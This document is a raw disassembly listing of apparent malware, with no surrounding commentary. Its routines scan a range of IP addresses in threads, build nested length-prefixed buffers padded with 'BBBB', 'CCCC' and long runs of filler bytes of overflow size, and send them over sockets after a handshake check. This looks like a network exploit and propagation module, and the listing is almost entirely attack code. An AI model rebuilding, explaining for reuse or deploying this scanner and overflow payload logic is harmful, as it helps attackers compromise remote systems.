; sub_40CE95+92�j
push [ebp+var_4]
call ds:dword_4F533C ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
lea eax, [ebp+Src]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_4E3020 ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_4E30F4 ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Src]
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp loc_40CEC3
sub_40CE95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CF86 proc near ; DATA XREF: sub_401CC7+5DCF�o
Dest = byte ptr -130h
var_B0 = dword ptr -0B0h
Str = byte ptr -0ACh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_4F534C
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CFB4: ; CODE XREF: sub_40CF86+BC�j
push [ebp+var_2C]
push [ebp+var_1C]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_448B08 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push 1FFh ; Count
push eax ; Source
mov eax, [ebp+var_20]
imul eax, 234h
add eax, offset dword_455E18
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40CDC8
push edi
push edi
call ds:dword_4F5350 ; CreateThread
cmp eax, edi
mov [ebp+arg_0], eax
jz short loc_40D020
loc_40D015: ; CODE XREF: sub_40CF86+98�j
cmp [ebp+var_8], edi
jnz short loc_40D020
push 32h
call esi ; Sleep
jmp short loc_40D015
; ---------------------------------------------------------------------------
loc_40D020: ; CODE XREF: sub_40CF86+8D�j
; sub_40CF86+92�j
push [ebp+arg_0]
call ds:dword_4F533C ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_28]
jz short loc_40D047
inc [ebp+var_2C]
jmp loc_40CFB4
; ---------------------------------------------------------------------------
loc_40D047: ; CODE XREF: sub_40CF86+B7�j
push [ebp+var_1C]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_448B34 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409D34
push [ebp+var_20]
call sub_40BA72
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40CF86 endp
; =============== S U B R O U T I N E =======================================
sub_40D093 proc near ; CODE XREF: sub_40D335+E�p
; sub_40D335+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40D093 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push dword ptr [ebp+8]
call _strlen
pop ecx
push eax
lea ecx, [ebp-8]
push dword ptr [ebp+8]
call sub_40D0CB
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
mov eax, esi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40D0CB(void *Src,size_t Size)
sub_40D0CB proc near ; CODE XREF: .text:0040D0B5�p
; sub_40D335+11E�p
Src = dword ptr 4
Size = dword ptr 8
push ebx
mov ebx, [esp+4+Size]
push esi
push edi
mov esi, ecx
push ebx ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jz short loc_40D0FD
push ebx ; Size
push 0 ; Val
push edi ; Dst
call _memset
push ebx ; Size
push [esp+1Ch+Src] ; Src
push edi ; Dst
call _memcpy
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40D0FD: ; CODE XREF: sub_40D0CB+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40D0CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40D105(void *Src,size_t Size,int,int)
sub_40D105 proc near ; CODE XREF: sub_40D1FF+18�p
; sub_40D279+16�p ...
Src = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+Size]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi ; Size
call _malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40D151
push edi ; Size
push 0 ; Val
push esi ; Dst
call _memset
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; Dst
call _memcpy
push [ebp+arg_C] ; Size
mov eax, [ebp+Size]
add eax, esi
push [ebp+arg_8] ; Src
push eax ; Dst
call _memcpy
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40D151: ; CODE XREF: sub_40D105+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40D105 endp
; =============== S U B R O U T I N E =======================================
sub_40D15A proc near ; CODE XREF: sub_40D1FF+5E�p
; sub_40D1FF+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40D16A
push eax ; Memory
call _free
pop ecx
loc_40D16A: ; CODE XREF: sub_40D15A+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40D15A endp
; =============== S U B R O U T I N E =======================================
sub_40D173 proc near ; CODE XREF: sub_40D1FF+20�p
; sub_40D2DA+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_40D1A0
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40D1A4
loc_40D1A0: ; CODE XREF: sub_40D173+D�j
xor al, al
jmp short loc_40D1FB
; ---------------------------------------------------------------------------
loc_40D1A4: ; CODE XREF: sub_40D173+2B�j
mov eax, ebx
add eax, [esi+4]
push eax ; Size
push 0 ; Val
push edi ; Dst
call _memset
add esp, 0Ch
cmp ebx, 1
jnz short loc_40D1C9
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40D1E3
; ---------------------------------------------------------------------------
loc_40D1C9: ; CODE XREF: sub_40D173+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4] ; Size
lea eax, [edi+3]
push dword ptr [esi] ; Src
loc_40D1E3: ; CODE XREF: sub_40D173+54�j
push eax ; Dst
call _memcpy
add esp, 0Ch
push dword ptr [esi] ; Memory
call _free
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40D1FB: ; CODE XREF: sub_40D173+2F�j
pop edi
pop esi
pop ebx
retn
sub_40D173 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D1FF proc near ; CODE XREF: sub_40D335+89�p
; sub_40D335+E3�p ...
Src = dword ptr -8
Size = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+Src]
push dword ptr [esi+4] ; int
push dword ptr [esi] ; int
push 1 ; Size
push offset dword_4E5E2C ; Src
call sub_40D105
lea ecx, [ebp+Src]
call sub_40D173
mov eax, [ebp+Size]
inc eax
push eax ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40D239
xor al, al
jmp short loc_40D275
; ---------------------------------------------------------------------------
loc_40D239: ; CODE XREF: sub_40D1FF+34�j
mov eax, [ebp+Size]
inc eax
push eax ; Size
push 0 ; Val
push edi ; Dst
call _memset
mov byte ptr [edi], 3
push [ebp+Size] ; Size
lea eax, [edi+1]
push [ebp+Src] ; Src
push eax ; Dst
call _memcpy
add esp, 18h
mov ecx, esi
call sub_40D15A
mov eax, [ebp+Size]
lea ecx, [ebp+Src]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_40D15A
mov al, 1
loc_40D275: ; CODE XREF: sub_40D1FF+38�j
pop edi
pop esi
leave
retn
sub_40D1FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D279 proc near ; CODE XREF: sub_40D2AD+14�p
; sub_40D2CA+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4] ; int
lea ecx, [ebp+var_8]
push [ebp+arg_0] ; int
push dword ptr [esi+4] ; Size
push dword ptr [esi] ; Src
call sub_40D105
mov ecx, esi
call sub_40D15A
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40D279 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40D2AD(char *Str)
sub_40D2AD proc near ; CODE XREF: sub_40D335+F0�p
; sub_40D335+15B�p ...
Str = dword ptr 4
push esi
mov esi, ecx
push [esp+4+Str] ; Str
call _strlen
pop ecx
push eax
mov ecx, esi
push [esp+8+Str]
call sub_40D279
pop esi
retn 4
sub_40D2AD endp
; =============== S U B R O U T I N E =======================================
sub_40D2CA proc near ; CODE XREF: sub_40D316+B�p
; sub_40D335+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40D279
retn 8
sub_40D2CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D2DA proc near ; CODE XREF: sub_40D316+16�p
; sub_40D335+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40D173
test al, al
jz short loc_40D313
push dword ptr [esi+4] ; int
lea ecx, [ebp+var_8]
push dword ptr [esi] ; int
push 1 ; Size
push offset dword_448ECC ; Src
call sub_40D105
mov ecx, esi
call sub_40D15A
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40D313: ; CODE XREF: sub_40D2DA+F�j
pop esi
leave
retn
sub_40D2DA endp
; =============== S U B R O U T I N E =======================================
sub_40D316 proc near ; CODE XREF: sub_40D335+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40D2CA
test al, al
jz short loc_40D331
mov ecx, esi
call sub_40D2DA
loc_40D331: ; CODE XREF: sub_40D316+12�j
pop esi
retn 8
sub_40D316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D335 proc near ; CODE XREF: sub_40DB0C+88�p
Dst = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40D093
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40D689
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40D689
push esi
lea ecx, [ebp+var_30]
call sub_40D093
lea ecx, [ebp+var_20]
call sub_40D093
lea ecx, [ebp+var_50]
call sub_40D093
lea ecx, [ebp+var_18]
call sub_40D093
lea ecx, [ebp+var_40]
call sub_40D093
lea ecx, [ebp+var_38]
call sub_40D093
lea ecx, [ebp+var_28]
call sub_40D093
push 4
push offset dword_448B6C
lea ecx, [ebp+var_30]
call sub_40D279
push 3
push offset dword_448B74
lea ecx, [ebp+var_30]
call sub_40D279
lea ecx, [ebp+var_30]
call sub_40D1FF
lea ecx, [ebp+var_30]
call sub_40D2DA
mov esi, 800h
lea eax, [ebp+Dst]
push esi ; Size
push 42h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_40D279
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_40D279
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+Dst]
push eax
call sub_40D279
lea ecx, [ebp+var_20]
call sub_40D1FF
push offset dword_448ED0 ; Str
lea ecx, [ebp+var_50]
call sub_40D2AD
lea ecx, [ebp+var_50]
call sub_40D1FF
push esi ; Size
lea eax, [ebp+Dst]
push 44h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
lea ecx, [ebp+var_58]
push 410h ; Size
push eax ; Src
call sub_40D0CB
lea ecx, [ebp+var_58]
call sub_40D1FF
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40D316
lea ecx, [ebp+var_58]
call sub_40D15A
push esi ; Size
lea eax, [ebp+Dst]
push 43h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_40D2AD
push 4
push offset dword_448B78
lea ecx, [ebp+var_18]
call sub_40D279
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_40D279
sub edi, [ebp+arg_8]
lea eax, [ebp+Dst]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_40D279
lea ecx, [ebp+var_18]
call sub_40D1FF
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40D2CA
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40D2CA
lea ecx, [ebp+var_40]
call sub_40D2DA
lea ecx, [ebp+var_18]
call sub_40D15A
lea ecx, [ebp+var_50]
call sub_40D15A
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40D2CA
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40D2CA
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40D2CA
lea ecx, [ebp+var_38]
call sub_40D2DA
lea ecx, [ebp+var_20]
call sub_40D15A
lea ecx, [ebp+var_30]
call sub_40D15A
lea ecx, [ebp+var_40]
call sub_40D15A
push esi ; Size
lea eax, [ebp+Dst]
push 41h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_40D279
lea ecx, [ebp+var_28]
call sub_40D1FF
push 2
push offset dword_448EE4
lea ecx, [ebp+var_28]
call sub_40D279
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40D2CA
lea ecx, [ebp+var_28]
call sub_40D2DA
lea ecx, [ebp+var_38]
call sub_40D15A
lea ecx, [ebp+var_10]
call sub_40D093
lea ecx, [ebp+var_8]
call sub_40D093
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40D2CA
lea ecx, [ebp+var_10]
call sub_40D173
lea ecx, [ebp+var_28]
call sub_40D15A
push offset dword_448EE8 ; Str
lea ecx, [ebp+var_8]
call sub_40D2AD
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40D2CA
lea ecx, [ebp+var_8]
call sub_40D173
lea ecx, [ebp+var_10]
call sub_40D15A
push offset dword_448EEC ; Str
lea ecx, [ebp+var_10]
call sub_40D2AD
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40D2CA
lea ecx, [ebp+var_10]
call sub_40D173
lea ecx, [ebp+var_8]
call sub_40D15A
push offset dword_448EF0 ; Str
lea ecx, [ebp+var_8]
call sub_40D2AD
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40D2CA
lea ecx, [ebp+var_8]
call sub_40D173
lea ecx, [ebp+var_10]
call sub_40D15A
push offset dword_448EFC ; Str
lea ecx, [ebp+var_48]
call sub_40D2AD
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40D2CA
lea ecx, [ebp+var_8]
call sub_40D15A
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_40D697
; ---------------------------------------------------------------------------
loc_40D689: ; CODE XREF: sub_40D335+1B�j
; sub_40D335+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_40D697: ; CODE XREF: sub_40D335+352�j
pop edi
pop ebx
leave
retn
sub_40D335 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D69B proc near ; CODE XREF: sub_40D75F+A1�p
; sub_40D75F+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_4F5544 ; select
cmp eax, edi
jnz short loc_40D702
lea eax, [ebp+var_10C]
push eax
push esi
call sub_43ABA2 ; __WSAFDIsSet
test eax, eax
jnz short loc_40D706
loc_40D702: ; CODE XREF: sub_40D69B+54�j
xor eax, eax
jmp short loc_40D716
; ---------------------------------------------------------------------------
loc_40D706: ; CODE XREF: sub_40D69B+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4E3110 ; recv
loc_40D716: ; CODE XREF: sub_40D69B+69�j
pop edi
pop esi
leave
retn
sub_40D69B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D71A proc near ; CODE XREF: sub_40D75F+81�p
; sub_40D75F+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_4E30F4 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
cmp eax, 4
jz short loc_40D744
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D744: ; CODE XREF: sub_40D71A+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4E3148 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40D71A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40D75F(int,void *Src,size_t Size)
sub_40D75F proc near ; CODE XREF: sub_40D839+48�p
; sub_40DB0C+15B�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+Size]
lea ebx, [edi+41h]
push ebx ; Size
mov [ebp+var_4], ebx
call _malloc
mov esi, eax
pop ecx
test esi, esi
jnz short loc_40D788
xor al, al
jmp loc_40D834
; ---------------------------------------------------------------------------
loc_40D788: ; CODE XREF: sub_40D75F+20�j
push ebx ; Size
push 0 ; Val
push esi ; Dst
call _memset
push 2Fh ; Size
push offset dword_448C08 ; Src
push esi ; Dst
call _memcpy
push 8 ; Size
lea eax, [esi+31h]
push offset dword_448C38 ; Src
push eax ; Dst
mov [esi+2Fh], di
call _memcpy
push edi ; Size
lea ebx, [esi+3Bh]
push [ebp+Src] ; Src
mov [esi+39h], di
push ebx ; Dst
call _memcpy
push 6 ; Size
add ebx, edi
push offset dword_4E5E24 ; Src
push ebx ; Dst
call _memcpy
mov ebx, [ebp+arg_0]
push 85h
push offset dword_448B80
push ebx
call sub_40D71A
add esp, 48h
test al, al
jnz short loc_40D7F0
loc_40D7EC: ; CODE XREF: sub_40D75F+B5�j
xor bl, bl
jmp short loc_40D82B
; ---------------------------------------------------------------------------
loc_40D7F0: ; CODE XREF: sub_40D75F+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D69B
push [ebp+var_4]
push esi
push ebx
call sub_40D71A
add esp, 1Ch
test al, al
jz short loc_40D7EC
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D69B
add esp, 10h
mov bl, 1
loc_40D82B: ; CODE XREF: sub_40D75F+8F�j
push esi ; Memory
call _free
pop ecx
mov al, bl
loc_40D834: ; CODE XREF: sub_40D75F+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D75F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40D839(int,void *Src,size_t Size)
sub_40D839 proc near ; CODE XREF: sub_40DB0C+141�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_448C44
push [ebp+arg_0]
call ds:dword_4F5540 ; send
cmp eax, 48h
jnz short loc_40D874
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_40D69B
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40D874
cmp [ebp+var_20], 82h
jz short loc_40D878
loc_40D874: ; CODE XREF: sub_40D839+1B�j
; sub_40D839+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D878: ; CODE XREF: sub_40D839+39�j
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+arg_0] ; int
call sub_40D75F
add esp, 0Ch
leave
retn
sub_40D839 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D88B proc near ; CODE XREF: sub_40D8D7+29�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_43C470
call __ftol
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_43C468
fstp [esp+10h+var_10]
call _floor
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call __ftol
inc eax
leave
retn
sub_40D88B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D8D7 proc near ; CODE XREF: sub_40DA4E+23�p
var_4C = qword ptr -4Ch
var_38 = byte ptr -38h
var_28 = qword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Str = dword ptr 14h
mov eax, offset loc_43BA8F
call __EH_prolog
sub esp, 2Ch
push esi
lea eax, [ebp+var_D]
push edi
xor esi, esi
push eax
lea ecx, [ebp+var_38]
mov [ebp+var_20], esi
call sub_40DCD3
push 1
pop edi
push [ebp+arg_8]
mov [ebp+var_4], edi
call sub_40D88B
pop ecx
push eax
lea ecx, [ebp+var_38]
call sub_40DDE8
cmp [ebp+arg_8], esi
mov [ebp+var_18], esi
jbe loc_40DA22
push ebx
mov ebx, [ebp+arg_8]
loc_40D91F: ; CODE XREF: sub_40D8D7+144�j
cmp [ebp+arg_8], 3
jb short loc_40D92A
push 3
loc_40D927: ; CODE XREF: sub_40D8D7+5B�j
pop ebx
jmp short loc_40D93B
; ---------------------------------------------------------------------------
loc_40D92A: ; CODE XREF: sub_40D8D7+4C�j
cmp [ebp+arg_8], 2
jnz short loc_40D934
push 2
jmp short loc_40D927
; ---------------------------------------------------------------------------
loc_40D934: ; CODE XREF: sub_40D8D7+57�j
cmp [ebp+arg_8], edi
jnz short loc_40D93B
mov ebx, edi
loc_40D93B: ; CODE XREF: sub_40D8D7+51�j
; sub_40D8D7+60�j
and dword ptr [ebp+var_28+4], 0
mov dword ptr [ebp+var_28], ebx
fild [ebp+var_28]
push ecx
push ecx ; double
fmul ds:dbl_43C478
fstp [esp+4Ch+var_4C]
call _ceil
pop ecx
pop ecx
call __ftol
test ebx, ebx
mov [ebp+var_1C], eax
jbe short loc_40D97C
mov esi, [ebp+arg_4]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp+var_10]
shr ecx, 2
rep movsd
mov ecx, edx
push 1
and ecx, 3
rep movsb
pop edi
loc_40D97C: ; CODE XREF: sub_40D8D7+8A�j
mov cl, [ebp+var_10]
mov dl, [ebp+var_10]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp+var_14], cl
mov cl, [ebp+var_F]
sar cl, 4
and cl, 0Fh
add [ebp+arg_4], ebx
shl dl, 4
add cl, dl
mov dl, [ebp+var_F]
mov [ebp+var_13], cl
mov cl, [ebp+var_E]
sar cl, 6
and dl, 0Fh
sub [ebp+arg_8], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp+var_12], cl
mov cl, [ebp+var_E]
and cl, 3Fh
test eax, eax
mov [ebp+var_11], cl
jbe short loc_40D9E9
add [ebp+var_18], eax
loc_40D9CE: ; CODE XREF: sub_40D8D7+110�j
movsx eax, [ebp+esi+var_14]
lea ecx, [ebp+var_38]
mov al, byte_448C90[eax]
push eax ; int
push edi ; Size
call sub_40DD68
inc esi
cmp esi, [ebp+var_1C]
jb short loc_40D9CE
loc_40D9E9: ; CODE XREF: sub_40D8D7+F2�j
cmp [ebp+var_18], 48h
jb short loc_40D9FE
push [ebp+Str] ; Str
lea ecx, [ebp+var_38]
call sub_40DD40
and [ebp+var_18], 0
loc_40D9FE: ; CODE XREF: sub_40D8D7+116�j
push 4
pop esi
cmp [ebp+var_1C], esi
jnb short loc_40DA17
sub esi, [ebp+var_1C]
loc_40DA09: ; CODE XREF: sub_40D8D7+13E�j
push 3Dh ; int
push edi ; Size
lea ecx, [ebp+var_38]
call sub_40DD68
dec esi
jnz short loc_40DA09
loc_40DA17: ; CODE XREF: sub_40D8D7+12D�j
cmp [ebp+arg_8], 0
ja loc_40D91F
pop ebx
loc_40DA22: ; CODE XREF: sub_40D8D7+3E�j
mov ecx, [ebp+arg_0]
lea eax, [ebp+var_38]
push eax
call sub_40DCEB
mov [ebp+var_20], edi
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_38]
call sub_40DD38
mov ecx, [ebp+var_C]
mov eax, [ebp+arg_0]
pop edi
pop esi
mov large fs:0, ecx
leave
retn
sub_40D8D7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DA4E proc near ; CODE XREF: sub_40DB0C+124�p
var_1C = byte ptr -1Ch
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
mov eax, offset loc_43BAA9
call __EH_prolog
sub esp, 10h
push ebx
push esi
push edi
push offset dword_4E5E30
and [ebp+var_4], 0
push [ebp+arg_8]
lea eax, [ebp+var_1C]
push [ebp+arg_4]
push eax
call sub_40D8D7
add esp, 10h
lea ecx, [ebp+var_1C]
mov byte ptr [ebp+var_4], 1
call sub_40DDE4
lea ecx, [ebp+arg_C]
mov esi, eax
call sub_40DDE4
lea esi, [esi+eax+36h]
push esi ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40DAA4
xor bl, bl
jmp short loc_40DAE3
; ---------------------------------------------------------------------------
loc_40DAA4: ; CODE XREF: sub_40DA4E+50�j
